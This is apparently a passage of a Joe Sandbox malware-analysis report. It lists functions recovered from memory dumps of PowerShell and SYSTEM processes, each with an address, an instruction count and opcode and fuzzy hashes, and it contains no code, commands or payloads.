                                                                          Function 00007FFD9B75A0FB Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1998425735.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5d0e2eb58ff977f014876e537c4ee23df9cc9b151facab95c613831ae3196cea
                                                                          • Instruction ID: b26aecf5bcceb3fcf5e6b7517ca63304c4a7905819fa204c032c51256662a438
                                                                          • Opcode Fuzzy Hash: 5d0e2eb58ff977f014876e537c4ee23df9cc9b151facab95c613831ae3196cea
                                                                          • Instruction Fuzzy Hash: FDF0467660AB8C0FCB42DF2C98690D47FB0FFA2200B0502BBD488CB032EA205949C7C1

                                                                          Non-executed Functions

                                                                          Function 00007FFD9B7585FA Relevance: 6.4, Strings: 5, Instructions: 140COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1998425735.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: O_^$O_^$O_^$O_^$O_^
                                                                          • API String ID: 0-1643777136
                                                                          • Opcode ID: 4e5fb7aa1ba5f1b786ce865b5820b776f324a2fb330079a1b247559a0428159f
                                                                          • Instruction ID: f2e926c88404cda62bf0e92e1b8ebbea853e71d6be693bdedde4a53987f5f9d0
                                                                          • Opcode Fuzzy Hash: 4e5fb7aa1ba5f1b786ce865b5820b776f324a2fb330079a1b247559a0428159f
                                                                          • Instruction Fuzzy Hash: 1A41E693E4F7D65BE76246A9586D4943BD0FF22B5470E01FBC4EA8B1B3EC452A478302
                                                                          Function 00007FFD9B758BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1998425735.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_7ffd9b750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: O_^4$O_^7$O_^F$O_^J
                                                                          • API String ID: 0-875994666
                                                                          • Opcode ID: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
                                                                          • Instruction ID: c6d9b2d0c2ff08d3293f05b0eab946ed7a940923da6cd4906114a1555b4d9642
                                                                          • Opcode Fuzzy Hash: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
                                                                          • Instruction Fuzzy Hash: 2521D4BB7195269ED3057B7DB8149ED3741CFE423674502F2E1AE8F293EE14708A8A90

                                                                          Executed Functions

                                                                          Function 00007FFD9B836605 Relevance: 1.7, Strings: 1, Instructions: 443COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2201314451.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b830000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: f4525b8596b2ad8b54afe0c84e39c2a269d121266d1aca83b02ad3bcda33f5ff
                                                                          • Instruction ID: a0b7703d14db7f20e142236826fcc3a4ece0fe935f9039875d5f7f43bfba4df8
                                                                          • Opcode Fuzzy Hash: f4525b8596b2ad8b54afe0c84e39c2a269d121266d1aca83b02ad3bcda33f5ff
                                                                          • Instruction Fuzzy Hash: 80D15772B0FA8E4FEB69AB6C88745B57BE0EF19214B1901FED45DC72E3D918A805C341
                                                                          Function 00007FFD9B76644D Relevance: .7, Instructions: 721COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2200235896.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: af7fcbc8d384765e79de4c90b375960d494862524cbb3ff6c291cc2f5d0307ec
                                                                          • Instruction ID: 7b84dfdbe431b1d3c90dbf2f18c1d3192cce10f946982357b0c050a2fcaae024
                                                                          • Opcode Fuzzy Hash: af7fcbc8d384765e79de4c90b375960d494862524cbb3ff6c291cc2f5d0307ec
                                                                          • Instruction Fuzzy Hash: 09D17131A18A4ECFDF98DF58C465AE97BE1FF68300F55426AD409D72A5CB34E881CB81
                                                                          Function 00007FFD9B76A0E0 Relevance: .3, Instructions: 266COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2200235896.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 58670474dcbd015d6f61dae1f932ee7b36a52070a6f4f54d96375eee1bc8d5b8
                                                                          • Instruction ID: cf0ce66cc2e6568e70cd695906ec4ba3a6379ef8fd7ff8f31301c8a9ea576dfb
                                                                          • Opcode Fuzzy Hash: 58670474dcbd015d6f61dae1f932ee7b36a52070a6f4f54d96375eee1bc8d5b8
                                                                          • Instruction Fuzzy Hash: 87214A6690E7CD8FD7579B7898751E47FB0EF63214B0A01E7D0C8CA0B3DA1959098792
                                                                          Function 00007FFD9B769D3C Relevance: .2, Instructions: 229COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2200235896.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9d3415bb39d421d73e97cce457275a8f34cf5db3e0653f9009441acda5e38165
                                                                          • Instruction ID: eff297c60423225b8bb34de5fd173642de6d5331674f19aec569369dfb9980f1
                                                                          • Opcode Fuzzy Hash: 9d3415bb39d421d73e97cce457275a8f34cf5db3e0653f9009441acda5e38165
                                                                          • Instruction Fuzzy Hash: A001843191DACCCFDB529B6848281A87FE0FF65204B0901EBD4898B072DB119A19C782
                                                                          Function 00007FFD9B769750 Relevance: .1, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2200235896.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c4002066cc462efd34a9dcd11ff2894f4d4ae2c2c33f56e6c23aa06d3cc7ef0
                                                                          • Instruction ID: c9cb2cc04b23baeaa231c1bfe403434773df7da81ac2e968023d951f0cacd75d
                                                                          • Opcode Fuzzy Hash: 0c4002066cc462efd34a9dcd11ff2894f4d4ae2c2c33f56e6c23aa06d3cc7ef0
                                                                          • Instruction Fuzzy Hash: E741397190DB888FDB18DB5C9C1A6B8BFE0FB59310F04426FD489C3292CA64A915CBC3
                                                                          Function 00007FFD9B64EF00 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2199059710.00007FFD9B64D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B64D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b64d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 77ba62b457780f4b13d28d174acefbcbc492c1b6fece153141a1923c139fd8a3
                                                                          • Instruction ID: 5f736915261ec8817c5a4d11d0f04221b912ba08cc5a463db15e723d43f59cea
                                                                          • Opcode Fuzzy Hash: 77ba62b457780f4b13d28d174acefbcbc492c1b6fece153141a1923c139fd8a3
                                                                          • Instruction Fuzzy Hash: 1941157190EFC84FD7A69B289855A523FF1EF56220B0A01DFD0C8CB1A3D625A846C792
                                                                          Function 00007FFD9B76A64C Relevance: .1, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2200235896.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8156d741d099e35c5258ec1d0f81499bbe9ce133b73ef110207b347b7a87240b
                                                                          • Instruction ID: 8b92d620babb6d3c21f2832989a0ad063571cac9ca2b303ea716a5a7637ec8d4
                                                                          • Opcode Fuzzy Hash: 8156d741d099e35c5258ec1d0f81499bbe9ce133b73ef110207b347b7a87240b
                                                                          • Instruction Fuzzy Hash: 2E21093090DB4C8FDB59DBAC984A6E97BF0EB56321F04426BD049C3162DA746846CB92
                                                                          Function 00007FFD9B7633B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2200235896.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction ID: 606a3e1d64f3f184d29538b399a082f5dcd9ff4372c83a7c912515896dbd522b
                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction Fuzzy Hash: 2301677121CB0C8FD748EF0CE451AA5B7E0FB95365F10056DE58AC36A5DA36E882CB46
                                                                          Function 00007FFD9B83414D Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2201314451.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b830000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c8da98d0233e3bf11a8b3fbcf4deccac35c1945fb6501b5a3c8e078c49f1accc
                                                                          • Instruction ID: e1aeb5bee47c644a5af13894d188b5d1e33ad4cc8f9f23a3fe400f80dbee71d5
                                                                          • Opcode Fuzzy Hash: c8da98d0233e3bf11a8b3fbcf4deccac35c1945fb6501b5a3c8e078c49f1accc
                                                                          • Instruction Fuzzy Hash: A6F0B432B0D9094FDB68EB5CE4518D873E0EF5832071500BAE05DC71B3CA25EC40C740
                                                                          Function 00007FFD9B834400 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2201314451.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b830000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4f2fef6bca9eb7a85fc56f86b7c77f74b1c1cc72e5f70c0cd7e4a783bb481458
                                                                          • Instruction ID: d62835fa9f87c89ae3b064bbe48e01fa6dfb76aa92281e10cb1b00711dc27c7e
                                                                          • Opcode Fuzzy Hash: 4f2fef6bca9eb7a85fc56f86b7c77f74b1c1cc72e5f70c0cd7e4a783bb481458
                                                                          • Instruction Fuzzy Hash: 26F0BE32A0E5498FDBA4EB5CE0608A877E0FF0832071600BAE059C71A3DA25EC50C780
                                                                          Function 00007FFD9B8341D1 Relevance: .0, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2201314451.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b830000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction ID: 585ec3caf0cf4cdf2a5ccd245456338458df09984bb726fb38306844d3d01381
                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                          • Instruction Fuzzy Hash: 32E01A31B0C8088FDAB8DB4CE0519AD73E1EB9832171601BBD14EC7671CA26ED518B80

                                                                          Non-executed Functions

                                                                          Function 00007FFD9B768BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.2200235896.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffd9b760000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                          • API String ID: 0-2388461625
                                                                          • Opcode ID: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                          • Instruction ID: 50a0c9028fc9e5b9b9ba953ad775e5eb324d4aa13dc9b7a34a0055a2eab47c01
                                                                          • Opcode Fuzzy Hash: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                                                          • Instruction Fuzzy Hash: A521C577A445154EC30537BCBD619EC6B82DB6437834501F3E229CF593DE14648B8A82

                                                                          Executed Functions

                                                                          Function 00007FFD9B751038 Relevance: .4, Instructions: 421COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2fe3cb5c9a7e6a2f2838a0f96c1415512668199fd84f057e8b3eba67e7d8f936
                                                                          • Instruction ID: bae954af2ec6a1ea3843aea1aad8b788e6af74fc2565b08105d8c04fe9b3110e
                                                                          • Opcode Fuzzy Hash: 2fe3cb5c9a7e6a2f2838a0f96c1415512668199fd84f057e8b3eba67e7d8f936
                                                                          • Instruction Fuzzy Hash: EDC11736B196690FE764F7F8A464AFE3B91EF95320B0006BAE04DC71E7DD1868428790
                                                                          Function 00007FFD9B751B2D Relevance: .2, Instructions: 191COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8944064433ec21029ff315d8ec25da4c6a65eb308fe3ff211b1d38b16db3fef5
                                                                          • Instruction ID: 51321683535c3017df750ec0cb96fbd2097055759005e9cd233456d6e15fe6c7
                                                                          • Opcode Fuzzy Hash: 8944064433ec21029ff315d8ec25da4c6a65eb308fe3ff211b1d38b16db3fef5
                                                                          • Instruction Fuzzy Hash: 9951FD20B0E6C94FD79AABB848746657FE5DF9721AB0901FBE0C9C71E7ED485806C342
                                                                          Function 00007FFD9B750AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 9P_^
                                                                          • API String ID: 0-1898675183
                                                                          • Opcode ID: 9f1bf596356d69ddeb76b398798dc40ecead4740249b029211d9217427788448
                                                                          • Instruction ID: 01ada1fe1f21ba8c18c3356d051aa1a175e4e560cd7242d0184edb2365925b02
                                                                          • Opcode Fuzzy Hash: 9f1bf596356d69ddeb76b398798dc40ecead4740249b029211d9217427788448
                                                                          • Instruction Fuzzy Hash: 3E61693AB0961A4EE704FBFCB4619FD37A2EF95324B1406B6E05DC71E7CE2864468790
                                                                          Function 00007FFD9B750E8E Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4P_^
                                                                          • API String ID: 0-2202116914
                                                                          • Opcode ID: 87a68247d491849dfee4e81d8d9d9b1fcb98637d858f208aac10beed7ebfb48c
                                                                          • Instruction ID: 2684d3196ddbd7811a640f26c6bacc09af82a4d09cceeb70f0726965746a40e8
                                                                          • Opcode Fuzzy Hash: 87a68247d491849dfee4e81d8d9d9b1fcb98637d858f208aac10beed7ebfb48c
                                                                          • Instruction Fuzzy Hash: 20514A21B0E78A0FE356ABBC58659B93BE5DF86224B0901FBE08CC71E7DD1858438752
                                                                          Function 00007FFD9B750985 Relevance: .3, Instructions: 346COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c994a75137a7d5ffcd6f8470381174311ecbf0b6df2ab7e72d774cc5b69efe41
                                                                          • Instruction ID: 81ae4e4c5faa32a81bf342a5fc752d7af4e667894e2fa80ed13c3f11852e491c
                                                                          • Opcode Fuzzy Hash: c994a75137a7d5ffcd6f8470381174311ecbf0b6df2ab7e72d774cc5b69efe41
                                                                          • Instruction Fuzzy Hash: 73A1253B7085664EE304BBBCB8619EE3BA5EF9532070406B7E149CB1D7CE246486C7E0
                                                                          Function 00007FFD9B7509D3 Relevance: .3, Instructions: 320COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bfaa211d9dbb203f9bc44dad66a1e57f2031fcebc84eeaf6dcccface43210d85
                                                                          • Instruction ID: 96668ab4fa8c30326e00df9c77a9015f04096678c0743fd214306d096cef9da1
                                                                          • Opcode Fuzzy Hash: bfaa211d9dbb203f9bc44dad66a1e57f2031fcebc84eeaf6dcccface43210d85
                                                                          • Instruction Fuzzy Hash: 4F91163B70851A5EE304BBBCB8659EE3BA5EFD523070446B7E149CB1D7CE24244687E0
                                                                          Function 00007FFD9B750A08 Relevance: .3, Instructions: 305COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 494fbe12f0cd521149ac14995ecb6b1794f62db6bd834fda9938714439054b66
                                                                          • Instruction ID: 11585c3c21f49fc7687480cbd30663084e23a4cdfd127839d4008077058b72d4
                                                                          • Opcode Fuzzy Hash: 494fbe12f0cd521149ac14995ecb6b1794f62db6bd834fda9938714439054b66
                                                                          • Instruction Fuzzy Hash: A781153B70852A5EE704BBBCB8619EE3BA5EF9532071446B7E149CB1D7CE242486C7D0
                                                                          Function 00007FFD9B750A10 Relevance: .3, Instructions: 301COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b1dfc050fb8c11212cac1c77b8df5863cf9ec9072de1f1318cdeefe78c27964
                                                                          • Instruction ID: 84c2344383a4bcc80f524c71ca281222a21e6e9c2ab878cbfb0bdc0d725aef6a
                                                                          • Opcode Fuzzy Hash: 0b1dfc050fb8c11212cac1c77b8df5863cf9ec9072de1f1318cdeefe78c27964
                                                                          • Instruction Fuzzy Hash: E881053B70851A5EE704BBBCB8619EE3BA5EF9532071446B7E149CB1D7CE242446C7D0
                                                                          Function 00007FFD9B750A48 Relevance: .3, Instructions: 270COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0911026d23b10dc8d6dfe872680d6a6a0a61e78b202a299f0b58570bde86db4e
                                                                          • Instruction ID: c07709d2729008599f53e8e880dfed3125d036a9cee2709ad8bbd4c7bed3150c
                                                                          • Opcode Fuzzy Hash: 0911026d23b10dc8d6dfe872680d6a6a0a61e78b202a299f0b58570bde86db4e
                                                                          • Instruction Fuzzy Hash: 2D71163BB0851A5EE704BBBCB8619EE3BA5EF95320B1446B6E14DC71D7CE246046C790
                                                                          Function 00007FFD9B7507D3 Relevance: .2, Instructions: 151COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3577a9f4bf5fa4cbe0e7a8a5b8acef0b04f382eb36ea77c51f811e56e696e46
                                                                          • Instruction ID: acd9ea1633cc49eb2ed717f5e3502588ed6a6f76c5e60c2982085498c16c29db
                                                                          • Opcode Fuzzy Hash: e3577a9f4bf5fa4cbe0e7a8a5b8acef0b04f382eb36ea77c51f811e56e696e46
                                                                          • Instruction Fuzzy Hash: DA41562AB5DADA0ED305F7A8A4718EE3FB1AFA521075442F6E18DC73DBCD282405C751
                                                                          Function 00007FFD9B750638 Relevance: .1, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a1db449833a4e4a79115f994b669565f5a0afd1b1740535b968a013b17cd0f48
                                                                          • Instruction ID: ecb4d7f2fc58d33097dcd43f6bb00114d6f040cd0a1ad33d731bc158e3ebaa34
                                                                          • Opcode Fuzzy Hash: a1db449833a4e4a79115f994b669565f5a0afd1b1740535b968a013b17cd0f48
                                                                          • Instruction Fuzzy Hash: 3231C621B189494FE79CEB6C4869679B6D2EF98305F0505BEE04EC32EBDD649C418341
                                                                          Function 00007FFD9B750D21 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c9562779fb15f48f424cd3dfea5dd572f5e9dc3fdc14e280df4317b2140e2ddf
                                                                          • Instruction ID: d605da340e4757e076e52334b4f65716151f89a045c241310c4113d1fbb0c014
                                                                          • Opcode Fuzzy Hash: c9562779fb15f48f424cd3dfea5dd572f5e9dc3fdc14e280df4317b2140e2ddf
                                                                          • Instruction Fuzzy Hash: EB31F661B19A490FE744BBFC586A7BD76D2EF98710F1502BAF00DC31D7DD5868018782
                                                                          Function 00007FFD9B750BD3 Relevance: .1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aae2b3cd62c035467d7bb44191e2c02ecfc0893390bf1ffadb54540bb1d8c905
                                                                          • Instruction ID: 9b6719333e88f9e8fcaa395b216d33f46803ae18b7f23a6a41714693d271871c
                                                                          • Opcode Fuzzy Hash: aae2b3cd62c035467d7bb44191e2c02ecfc0893390bf1ffadb54540bb1d8c905
                                                                          • Instruction Fuzzy Hash: D841B475B19A4E4FDB44EBA89875AEE7BF2FF99300F5006B9E019D32D6CD286801C750
                                                                          Function 00007FFD9B750838 Relevance: .1, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 58027951a1c95f618a1925be1e2f77da8bfb13ac70f756ddbc7539e06918af9b
                                                                          • Instruction ID: b3404fd4c4943cbcd5ae2cf2e5baf4ca450adb6a8dce913cb5ae85581905844d
                                                                          • Opcode Fuzzy Hash: 58027951a1c95f618a1925be1e2f77da8bfb13ac70f756ddbc7539e06918af9b
                                                                          • Instruction Fuzzy Hash: EE210334B59ACA4FD345EBA880B48EE3FB1BFE5200BA046E5E549C33DBDD282800C751
                                                                          Function 00007FFD9B751CE1 Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2276671487.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ffd9b750000_SYSTEM.jbxd
